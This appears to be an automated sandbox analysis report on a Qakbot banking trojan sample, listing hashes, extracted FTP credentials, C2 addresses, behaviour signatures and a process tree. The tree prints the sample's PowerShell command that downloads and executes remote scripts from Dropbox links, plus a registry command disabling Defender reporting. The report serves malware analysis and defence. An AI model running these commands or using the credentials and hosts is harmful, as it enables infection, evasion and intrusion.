Overview

overview

10

Static

static

4845e63232...a4.exe

windows7_x64

10

4845e63232...a4.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    20s
  • max time network
    73s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    14-07-2022 03:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe

  • Size

    616KB

  • MD5

    adab2a637738b6780e74b74dcabbb96f

  • SHA1

    0614b295d8f8486ea42c89be35b3e44926a943c0

  • SHA256

    4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4

  • SHA512

    72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

Score
10/10
qakbot1532427880bankerstealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
ps1.dropper

https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

Family

qakbot

Version

322.368

Campaign

1532427880

Credentials

  • Protocol:     ftp
  • Host:
    37.60.244.211
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    4AsEzIaMwi2d

  • Protocol:     ftp
  • Host:
    198.38.77.162
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    kJm6DKVPfyiv

  • Protocol:     ftp
  • Host:
    61.221.12.26
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    346HZGCMlwecz9S

  • Protocol:     ftp
  • Host:
    67.222.137.18
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    p4a8k6fE1FtA3pR

  • Protocol:     ftp
  • Host:
    107.6.152.61
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    RoP4Af0RKAAQ74V
C2

216.218.74.196:443

185.219.83.73:443

50.198.141.161:2078

70.118.18.242:443

68.113.142.24:465

72.193.162.108:443

98.225.141.232:443

216.201.159.118:443

73.130.229.200:443

76.73.202.82:443

67.197.97.144:443

71.77.22.206:443

47.40.29.239:443

65.116.179.83:443

96.248.15.254:995

47.134.236.166:443

173.81.42.136:20

73.106.122.121:443

98.103.2.226:443

181.93.205.181:443

Signatures

  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

    trojanbankerstealerqakbot
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:2272
  • C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    1⤵
      PID:3292
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3084
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2092
      • C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
        "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"
        2⤵
        • Checks computer location settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:912
        • C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
          "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe" /C
          3⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          PID:1612
        • C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe
          C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4124
          • C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe" /C
            4⤵
            • Executes dropped EXE
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            PID:4748
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:5056
        • C:\Windows\system32\reg.exe
          C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
          3⤵
            PID:2132
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\jaqhvnzhwhynhbmqqjwszaxuxcza.txt'"
            3⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4584
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5044
            • C:\Windows\SysWOW64\PING.EXE
              ping.exe -n 6 127.0.0.1
              4⤵
              • Runs ping.exe
              PID:4640
      • C:\Windows\system32\taskhostw.exe
        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2444
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2288

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      3
      T1082

      Peripheral Device Discovery

      1
      T1120

      Remote System Discovery

      1
      T1018

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfx.dat
        Filesize

        92B

        MD5

        afa2afe332d1e22d1f5d85be495d1693

        SHA1

        357d0f4d9c86fedd608edf1e172d974d8a9a7438

        SHA256

        79e02368bccfabdbee810fc90f7266baaf8031b31d21c80a4fab6f58fd85c2f2

        SHA512

        88c8e9e7900e0af1cc7e0bf8950400465929eb241292c596028a35e3bf78894ee890353581251f75d02d02f40154e0fecb834acb2acb34cb5cbdc32bf4beefef

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe
        Filesize

        616KB

        MD5

        adab2a637738b6780e74b74dcabbb96f

        SHA1

        0614b295d8f8486ea42c89be35b3e44926a943c0

        SHA256

        4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4

        SHA512

        72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe
        Filesize

        616KB

        MD5

        adab2a637738b6780e74b74dcabbb96f

        SHA1

        0614b295d8f8486ea42c89be35b3e44926a943c0

        SHA256

        4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4

        SHA512

        72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe
        Filesize

        616KB

        MD5

        adab2a637738b6780e74b74dcabbb96f

        SHA1

        0614b295d8f8486ea42c89be35b3e44926a943c0

        SHA256

        4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4

        SHA512

        72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

        Download Submit
      • memory/912-130-0x0000000000400000-0x000000000049E000-memory.dmp
        Filesize

        632KB

        Download
      • memory/912-134-0x0000000000570000-0x0000000000576000-memory.dmp
        Filesize

        24KB

        Download
      • memory/1612-135-0x0000000000000000-mapping.dmp
        Download
      • memory/1612-140-0x0000000000530000-0x0000000000536000-memory.dmp
        Filesize

        24KB

        Download
      • memory/2092-170-0x0000000006F30000-0x0000000006F5C000-memory.dmp
        Filesize

        176KB

        Download
      • memory/2132-143-0x0000000000000000-mapping.dmp
        Download
      • memory/2272-167-0x0000000000C80000-0x0000000000CAC000-memory.dmp
        Filesize

        176KB

        Download
      • memory/2288-168-0x0000000000090000-0x00000000000BC000-memory.dmp
        Filesize

        176KB

        Download
      • memory/2444-169-0x0000000000420000-0x000000000044C000-memory.dmp
        Filesize

        176KB

        Download
      • memory/4124-141-0x0000000000000000-mapping.dmp
        Download
      • memory/4124-151-0x00000000006C0000-0x00000000006C6000-memory.dmp
        Filesize

        24KB

        Download
      • memory/4584-150-0x000002C8A7890000-0x000002C8A78B2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/4584-152-0x00007FFBD3AA0000-0x00007FFBD4561000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4584-149-0x0000000000000000-mapping.dmp
        Download
      • memory/4584-160-0x00007FFBD3AA0000-0x00007FFBD4561000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4640-164-0x0000000000000000-mapping.dmp
        Download
      • memory/4748-159-0x00000000004E0000-0x00000000004E6000-memory.dmp
        Filesize

        24KB

        Download
      • memory/4748-153-0x0000000000000000-mapping.dmp
        Download
      • memory/5044-162-0x0000000000000000-mapping.dmp
        Download
      • memory/5056-165-0x0000000000F30000-0x0000000000F99000-memory.dmp
        Filesize

        420KB

        Download
      • memory/5056-166-0x00000000016A0000-0x00000000016CF000-memory.dmp
        Filesize

        188KB

        Download
      • memory/5056-161-0x0000000000000000-mapping.dmp
        Download